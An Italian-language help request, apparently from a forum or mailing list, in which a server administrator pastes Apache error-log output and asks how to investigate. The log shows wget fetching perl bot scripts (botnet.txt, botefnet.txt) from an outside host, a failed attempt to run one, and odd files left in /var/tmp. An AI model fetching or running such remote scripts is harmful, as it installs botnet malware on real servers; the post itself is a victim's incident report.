Nel file var/log/apache2/error.log di apache 2 trovo delle righe del tipo :
--01:45:48-- http://www.eodspr.kit.net/vna.txt
=> `vna.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 404 Not Found
01:45:49 ERROR 404: Not Found.
Can't open perl script "vna.txt": No such file or directory
perl: no process killed
--01:50:24-- http://www.eodspr.kit.net/botefnet.txt
=> `botefnet.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,836 [text/plain]
0K .......... .......... 100% 31.18
KB/s
01:50:26 (31.18 KB/s) - `botefnet.txt' saved [20836/20836]
--02:23:57-- http://www.eodspr.kit.net/botnet.txt
=> `botnet.txt'
Resolving www.eodspr.kit.net... 201.7.184.2
Connecting to www.eodspr.kit.net[201.7.184.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,856 [text/plain]
0K .......... .......... 100% 29.98
KB/s
02:23:59 (29.98 KB/s) - `botnet.txt' saved [20856/20856]
inoltre nella cartella /var/tmp ci sono dei file sospetti che non credo
c'entrino nulla col sistema.. tipo :
port.tgz
httpd
seclogstate.state
ed altri..
immagino che ci siamo dei "problemi".. ma adesso cosa posso iniziare a fare
per capire che cosa sta succedendo???
ho provato chrootkit.. e non mi ha dato nessun "pericolo"
grazie!